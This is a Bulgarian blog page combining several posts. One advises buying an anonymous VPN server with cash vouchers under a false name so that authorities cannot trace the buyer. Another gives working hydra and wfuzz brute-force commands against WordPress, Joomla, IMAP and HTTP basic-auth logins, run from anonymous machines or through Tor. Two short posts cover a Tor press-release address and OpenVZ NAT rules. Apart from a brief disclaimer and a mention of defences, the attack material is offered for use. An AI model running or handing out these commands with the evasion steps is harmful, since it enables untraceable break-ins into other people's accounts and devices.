чудя се защо?!

Tова е България

Препоръчвам това видео на всеки, който има проблеми с самочувствието си на българин.

Как да си купим анонимен сървър?

Ако властите или конкуренцията Ви дишат във врата, или поне си мислите че го правят, можете да прибегнете до закупуването на анонимен сървър, някъде из интернет, през който да прекарате трафика си (VPN). Така ще ги забавите малко, докато разберат какво се случва. Практически VPN се явява една дълбоко заустена тръба в интернет, от която излиза Вашия трафик. Нещо като тази. Шегата на страна! Ако публикувате в интернет през истинското си IP чувствителна информация е въпрос на време да се разбере истинската Ви самоличност. Ако имате така нареченото статично IP, което си е само за Вас - това е елементарна задача. За да скриете самоличността можете да си сетъпнете VPN сървър някъде из света, който да се явява Вашата трибуна към интернет. Трафикът между него и Вас е криптиран, т.е. нещо като метална тръба до него. Ако в момента трафикът Ви е излизал от Варна, България, а след това трафика Ви ще излиза от Франция, за пример. Също като тръбата на Златни пясъци :)

Но ако платите за сървъра си с кредитната карта, дали въобще има смисъл да го сетъпвате? Вие вече сте осведомили, който трябва, че вирутално се премествате във Франция. И пак могат да Ви идентифицират.

Затова Ви препоръчвам да си купите анонимно сървър от Mr. Zhang,  но в никакъв случай да не плащате чрез кредитна карта. Най-добрият начин е плащане в кеш, но трудно ще стигнете до Китай, за да му платите на този човек. Затова в белите страни са измислени така наречените предплатени кредитни карти. В България няма да намерите такива. Но във Франция, Испания, Португалия има. Сигурен съм че имате приятел там. Изпратете му пари и му заръчайте да ви купи ваучър Ukash. Инструктирайте го да плати в КЕШ, а след това да Ви изпрати номерата на ваучъра. С него отивате при Mr. Zhang и си избирате машина. Може би не е нужно да Ви напомням, че е хубаво да се представите на Mr. Zhang като измислено лице, макар трудно да стигне Интерпол до него в Китай. Но Вие се подсигурете.

Същото важи и за покупка на анонимен домейн. До сега обаче нямам практика да съм купувал и бих приел Вашите съвети от къде е най-сигурно да се пазарува!

Как да влезем взлом (bruteforce) Wordpress/Joomla/Other web apps

Дори и най-перфектно и сигурно написаният сайт може да бъде компрометиран от глупостта на задклавиатурното устройство. Колкото и да сте си играли да осигурявате някой администраторски панел, в случай че сте дали парола на секретарката Незабравка, то Вие сте оставили дупка в сигурността на апликацията. Обикновено тези съсловия, но не само те, избират лесни и кратки паролки. Дали ще е рожденна дата, дали ще е кратко име с цифри 123 накрая, а може би елементарното 123456, то Вашият админ панел е отворен към света. Точно както няма ключалка направена от човек, която да не може да се разбие от човек, така е и с паролите. Но при разбиването на пароли по-големи от 10 символа вече си говорим за много ресурси и време. Парола от 6 цифри е елементарна за разбиване, а 6 до 8 букви и цифри - е реалистично. Затова избирайте сериозни и трудни пароли. И карайте потребителите си да го правят, иначе е било безсмислено да пишете качествен и сигурен код.

Една от стъпките при одит на сигурност на уеб сайт е проверката за слаби пароли. Много от уеб апликациите нямат защита срещу ботове (каптча или забрана след n на брой опити), което улеснява нашата задача при изпробване на речници с пароли. Всичко е автомагично, нали не мислите че ще го правим на ръка?

Инструментите, които Ви трябват, за разбиване на уеб апликации са crunch и wfuzz или hydra. Също така Ви трябва и анонимна машина (една или повече) от която да правите пробите. С crunch можете да генерирате речници с пароли. За него има страхотно ръководство тук. Wfuzz и Hydra имат интересни способности, документацията им е доста дискриптивна, но няма твърде много публикувани примери. Затова аз пускам моите записки тук, за да ги ползвате като начало на Вашето изследване. Не смятам да описвам документацията на тези програмки, а само да Ви дам примери за ползването им. Тези инструменти можете да ги намерите готови за използване в тази дистрибуция.

Как да влезем взлом (bruteforce) в Wordpress

hydra -l admin -P  /path/to/wordlist -s 80 wordpress_url_here http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=1:ERROR"

python wfuzz.py -t 1 -s 10 -c -z file -f  /path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&submit=1" http://wordpress_url_here/wp-login.php -V

Как да влезем взлом (bruteforce) в Joomla

python wfuzz.py -t 1 -s 10 -c -z file -f  /path/to/wordlist -d "usrname=admin&pass=FUZZ&submit=1" http://joomla_url_here/administrator/

Как да влзем взлом (bruteforce) в IMAP сървър

hydra -l user@emaila.com -P /path/to/wordlist server_host_here imap

Как да разбием basic auth (.htaccess & .htpasswd)

hydra -l admin -P wordlist/mywordlist/mixalpha-numeric-all-space_6 192.168.0.1 http-head /

(полезно при разбиване на модеми, рутери, аксес пойнтове)

В повечето случаи когато разбивате уеб апликация ще получавате код 200 при грешна парола, и 301 при успешна двойка. Така ще се ориентирате, коя парола е съвпаднала. Във всеки случай, трябва да знаете как работи системата за аутентикация преди да започнете да я разбивате.

Как да ползваме wfuzz през Tor

Изключително бавно е! Но все пак трябва да го отбележа като възможен сценарии.

python wfuzz.py -x SOCKS5 -p localhost:8118 -t 1 -s 10 -c -z file,/path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&wp-submit=1" http://host/wordpress/wp-login.php

python wfuzz.py -x SOCKS5 -p localhost:8118 -t 15 -s 3 -c -z file,/path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&wp-submit=1" -o html http://host/wp-login.php 2> file_to_print.html

!! АВТОРЪТ НЕ НОСИ НИКАКВА ОТГОВОРНОСТ ЗА ДЕЙСТВИЯТА НА ТРЕТИ ЛИЦА! Информацията тук е предоставена единствено за образователни и защитни цели! Хората трябва да знаят колко е лесно, за да се пазят по-добре! По-добре ще е да я ползвате за одит, а не за разбиване на паролата на рутера на съседа, нали? НЕ НОСЯ ОТГОВОРНОСТ!

Може би ще е добре да кажа и как се защитава Wordpress от взлом: С някой плугин от този тип. А imap, web, ssh и други демони могат да се защитят с Fail2Ban.

Скрит сървър на PressBulgaria.com

От вчера PressBulgaria.com има нов сървър, който е достъпен само чрез Tor мрежата. Чрез него ние PressBulgaria.com Ви дава възможност да изпратите анонимно прессъобщение, като дори няма да знаят Вашето IP. Така ще затрудним властите при следенето и анализирането на трафика към нашия сървър. Можете да прочетете повече за технологията тук.

Ето и onion адреса на сървъра:

4eqommyygzqiscxd.onion

Все пак имайте едно на ум, че 100% анонимност няма.

Няма MASQUERADE при OpenVZ?

Оказва се, че няма модул за MASQUERADE за OpenVZ, а повечето достъпни VPS-и използват точно него за виртуализация. Ако човек тръгне да се грижи за анонимността си и иска да си сетъпне собствен openvpn под Debian ще се сбори с openvz vs. masquerade. Има и друг начин да пуснем така желания трафик на vpn клиентите

iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -s 10.8.0.0/24 -j ACCEPT
iptables -A FORWARD -j REJECT
iptables -t nat -A POSTROUTING  -s 10.8.0.0/24 -o venet0 -j SNAT --to-source 1.2.3.4

 Където 1.2.3.4 е реалното ип на впс-а.

Намерено тук, изключително търсено, трудно намерено. Полезно :)